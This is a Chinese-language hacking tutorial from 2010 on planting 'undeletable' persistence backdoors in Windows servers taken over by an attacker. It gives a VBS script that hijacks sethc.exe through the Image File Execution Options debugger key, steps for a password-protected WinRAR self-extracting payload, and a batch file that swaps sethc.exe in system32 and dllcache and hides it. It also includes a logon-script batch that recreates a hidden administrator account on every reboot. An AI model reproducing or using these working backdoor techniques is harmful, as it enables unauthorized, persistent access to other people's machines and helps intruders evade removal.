不死Shift后门的制作

时间：2010-11-27 来源：linuxfly

大家都知道Shift后门对应的文件为：sethc.exe

不死Shift后门的制作只要把sethc.exe挟持，别人就删不掉了。

复制内容到剪贴板程序代码 Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\obc32.exe","REG_SZ"

把上面代码保存为 *.vbs, 然后运行vbs就可以了

用来挟持shift的，让别人替换不了你的后门

这里注意了，shift后门文件名可以随便写，我这里是obc32.exe

这样在电脑里也搜索不到sethc.exe,哈哈

但必须跟代码里的文件名对应上，system32目录下的

前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking

1.我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件.

2.再把这个批处理文件AK.bat加到win.rar压缩包内加密．在高级选项里设置密码如：！＠＃＄％＾＆

3.将win.rar做成自解压格式:

添加新的自解压→Default.SFX 图形界面 RAR自解压模块→高级自解压选项→解压后运行(添加: cmd.exe 也有用%SystemRoot%\explorer.exe的)→模式→选择:全部隐藏+覆盖所有文件→确定

4.然后我们再建立一个批处理文件RU.BAT,用来将win.exe(win.rar做成自解压后生成的文件)替换到system32下.

主要实现目的为执行:

copy win.exe C:\WINDOWS\system32\sethc.exe /y
copy win.exe C:\WINDOWS\system32\dllcache\sethc.exe /y

这是一位网友写的批处理RU.BAT,可以借鉴.都是满简单的.

@echo off
cls

copy win.exe C:\WINDOWS\system32\sethc.exe
copy win.exe C:\WINDOWS\system32\dllcache\sethc.exe
attrib C:\WINDOWS\system32\sethc.exe sethc.exe
attrib C:\WINDOWS\system32\dllcache\sethc.exe +h
echo
cls
echo.
del win.exe

del %0%

5.将RU.BAT及WIN.EXE传到肉鸡上并运行RU.BAT就完成了shift后门的安装.

不死3389帐号:

关于不死帐号的方法常见的几种中我们今天简单的介绍一种依靠特殊路径开机自动执行BAT命令添加管理帐户的方法.很简单,一看就明白了,这里我也不多做解释了:

制作批处理文件ad.bat ,代码内容为:

@echo off

cls

net user amxking /del
net user amxking !@#$%^&*(000 /add 注释：前面amxking是用户名后面!@#$%^&*(000 是密码,如此设置一是安全目的,二是方便通过具有密码策略的效验,注意不要超过14位,否则有些老版本系统不支持;

net localgroup administrators amxking /add

将ad.bat上传到肉鸡上,路径为:

C:\WINDOWS\system32\GroupPolicy\User\Scripts\Logon

这样只要肉鸡服务器重起就会执行ad.bat将我们的帐户添加并提权为管理帐户.也就实现了所谓的不死帐号.